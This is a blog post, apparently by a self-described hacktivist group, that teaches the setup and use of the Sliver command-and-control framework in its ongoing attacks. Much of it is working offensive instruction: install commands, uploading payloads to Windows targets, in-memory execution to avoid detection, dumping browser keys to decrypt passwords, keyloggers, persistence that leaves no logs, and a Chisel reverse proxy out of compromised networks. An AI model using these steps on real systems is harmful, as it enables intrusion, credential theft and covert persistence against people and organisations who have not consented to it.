The post Sliver: Building a C2 During a Cyber War, Part 1 first appeared on Hackers Arise.

Hello cyberwarriors. This series is about Sliver – a command and control (C2) framework actively used by us, the Cyber Cossacks, during the ongoing cyber war against Russia. We aim to show you the techniques and tactics we use and demonstrate how Sliver can become a powerful and reliable tool when used properly.
At its core, a command and control server is software designed to execute commands or binaries on a remote machine, or even an entire network of machines. The main goal of a C2 is to provide centralized control, allowing an operator to manage multiple systems within a compromised environment. The operator is the person responsible for carrying out the attack and maintaining access. This access can be achieved in various ways, such as exploiting a SQL injection vulnerability, leveraging weak credentials on services like SSH or RDP, or gaining access to a system that already serves as a foothold within the target network.
Once this initial access is achieved, the C2 is used to generate a specialized executable file. After this file is delivered to the target machine, it creates a communication channel back to the C2 server when it is executed. From this point forward, we will refer to these executables as beacons.
Tmux
To use a C2 effectively, you need to master some Tmux basics. Tmux is a terminal multiplexer. It lets you run and manage multiple shell sessions inside a single SSH connection. Even if the connection drops, your sessions keep running. This is very useful in C2 setups because you can leave listeners, scripts, and pivot points running, organize your windows, split your screens for easier monitoring, and switch back and forth between tasks without losing progress.
Tmux is not only about keeping things running. It helps you organize your workflow by splitting your terminal window, naming sessions, and quickly switching between tasks. It keeps everything tidy and resilient, especially in long-running operations.

Setting Up Tmux
Start by installing it:
c2 > sudo apt install tmux

After installation, it’s good practice to configure Tmux to suit your needs. You’ll want to create a configuration file:
c2 > nano ~/.tmux.conf

This configuration will extend your scrollback history so you can view older outputs. It will also prevent tmux from auto-renaming your windows, which is helpful when you’re dealing with a large number of windows. Additionally, the config will add custom hotkeys to help you join and send panes across windows and integrate basic Vim functionality – something that will come in handy later.
Sessions
Once your config is ready, apply it with the following command:
c2 > tmux source-file ~/.tmux.conf
Then start a new session:
c2 > tmux new -s sliver

Commands
Inside this session, you can begin splitting the window for multitasking. Most of our operators split their workspace into three or four panes depending on what they are monitoring. Tmux uses its own set of hotkeys, so you need to remember the prefix: Ctrl + B. After pressing and releasing the prefix, use " to split the window horizontally and % to split it vertically. You can move between panes with the arrow keys after hitting the prefix.

Renaming Windows
To make it easier to manage your workspace, you can rename each window. This is done by pressing the prefix followed by the comma key, which allows you to assign a new name that reflects the task in that window.

Replace the given name with something task-related.
New Windows
When your workflow expands, and you need another full window, press the prefix (Ctrl + B) then c to create one. Use this new window to browse files or keep logs separate from your primary attack window.

Sending & Joining Panes
Your Tmux configuration should also support two important features: sending and joining panes between windows. With your hotkeys configured, you can use prefix + s to send a pane to a different window, and prefix + j to join a pane from another window into your current view. These two commands make it easier to manage your terminal workspace efficiently.

Scrolling
When the output of a command is longer than your visible buffer, you can scroll up using prefix + [ and then use your arrow keys or mouse.
Copying Text
To copy text, press prefix + [, then Space to start selecting, use the arrows to highlight the desired content, and then press Enter to copy. The content is stored in the Tmux clipboard, not your system clipboard.

To paste, use prefix + ]. If you’re copying sensitive data like Kerberos tickets, it’s a good idea to save the data into a file and download it to your local machine using scp or wget.

Search
Vim integration also allows you to search through previous output. Activate scroll mode with prefix + [, then press / and type the keyword you’re looking for. For example, to find information about “roast” attacks, you could type roast and hit Enter. If you want to search from a specific point onward, scroll up to that point before searching.

Detaching
Sometimes you’ll need to detach from a session without closing it. This is useful if you’re switching to a different task or user session. To detach from your current Tmux session, press prefix + d. You can later reattach to the same session using tmux attach -t

Sliver
Now that you’ve set up Tmux and understand how to manage your environment, it’s time to install and configure Sliver. The setup is done in two stages. First you install the server and then the client.
Sliver Server
Install the server with this one-liner:
wget -q https://github.com/BishopFox/sliver/releases/download/v1.5.43/sliver-server_linux; chmod +x ./sliver-server_linux; ./sliver-server_linux


The server will launch in a few seconds. Once it’s up and running, you’ll need to add a new operator. The operator name is your user identity within the Sliver ecosystem. You also need to define the IP address it will connect from. If you’re working locally, use 127.0.0.1. Before adding the operator, enable multiplayer mode. This will allow you to connect yourself and other operators if needed:
[server] sliver > multiplayer
[server] sliver > new-operator -n

Sliver Client
With the server ready, you can now set up the client. The client is what you will use to connect to your Sliver server. It can be installed on the same machine or on a separate one, depending on your setup. To install and start the client, run:
c2 > wget -q https://github.com/BishopFox/sliver/releases/download/v1.5.43/sliver-client_linux; chmod +x ./sliver-client_linux; ./sliver-client_linux import overwatch_127.0.0.1.cfg; ./sliver-client_linux
Note that this one-liner includes the name of your config file, which will be different from ours.
Once the client is connected, it’s time to work with Armory. Armory is Sliver’s built-in module management system. It allows you to add, update, and remove tools from your C2 environment without affecting the main program. Using Armory, you can view available modules, install the ones you need, update them individually or all at once, and remove any that you no longer want.
Armory
To see the available modules, use armory list. To install a specific module, use armory install

Armory has many tools, such as Seatbelt for checking Windows security configurations, Rubeus for working with Kerberos tickets, SharpHound for gathering information about Active Directory, and KrbRelayUp for executing Kerberos relay attacks. One of the most practical tools is Chisel, which allows you to set up a proxy tunnel through the compromised target. After installation, each tool becomes part of the Sliver environment and can be run like any built-in command. Be aware that these tools can be flagged by antivirus or EDR solutions.
Sliver Commands
Once your environment is ready, you should start learning the commands Sliver provides.
Help
The help command will display a complete list of available commands, including core Sliver functions, macro commands, third-party tools, and Windows-specific actions. There are too many to memorize at once, so it’s better to explore them gradually during real operations.

Sessions
To check your active sessions, use sessions. Over time, some sessions may go inactive or be lost. Use sessions prune to clean up dead sessions. If a connection drops, the implant will try to reconnect every two minutes by default.

Jobs
Another key feature is jobs, which displays active listeners and ports. If you don’t have any listeners running, your beacons won’t be able to communicate back to the C2.

Cat
Commands like cat can be extended with flags. Running cat -h shows available options. For example, you can use -X to save command output as loot, which is useful when dealing with sensitive or valuable files.

Loot
The loot command helps you manage stored credentials, files, and keys. It’s your internal database for stolen data.

Download & Upload
You will frequently use the upload and download commands to move payloads or retrieve data. Be cautious with large files – anything over 100 MB might destabilize your session. Here’s how you use these commands with a Windows target:
sliver > upload /root/payloads/payload.exe C:\\Windows\\Temp\\payload.exe
sliver > download C:\\Windows\\Temp\\Bloodhound.zip /root/target/BH.zip

Execute-Assembly
A particularly powerful command is execute-assembly. It runs executables or DLLs directly in memory on the target machine, bypassing disk access entirely. This makes detection much harder. Use this to run tools like Seatbelt, SharpHound, or your own custom C# payloads.

To run DLLs or executables in memory, type this:
sliver > execute-assembly /path/to/assembly
Extensions
The extensions category contains specialized commands. For example, sa-list_firewall_rules can show you what rules are configured on the target.

You can also dump browser master keys using chromiumkeydump, which is essential for decrypting saved passwords.

Keyloggers can be started to catch credentials when users log into services. For this you have raw-keylogger.

For persistence, remote-ghost_task allows you to schedule tasks quietly without generating logs.

Chisel
Finally, Chisel allows you to create a stable proxy. Start the server:
c2 > ./sliver server --reverse -v -p 1257 --socks5

Then, from the beaconed target, run:
sliver (session) > chisel client -v

Make sure port 1080 is free for the proxy, as Chisel uses it by default.
Conclusion
This article laid the groundwork for setting up and using Sliver effectively in offensive operations. We started with the essential Tmux setup to organize your work environment and moved into the full configuration of both the Sliver server and client. You learned how to use Armory to extend your capabilities and were introduced to Sliver’s core commands, including session handling, file transfers, in-memory payload execution, and persistence options. Sliver is more than just a basic C2; it’s a modular, adaptable, and powerful platform for modern engagements. Mastering its tools and functions will allow you to carry out full-scale operations without depending on external utilities.
Source: HackersArise
Source Link: https://hackers-arise.com/sliver-building-a-c2-during-a-cyber-war-part-1/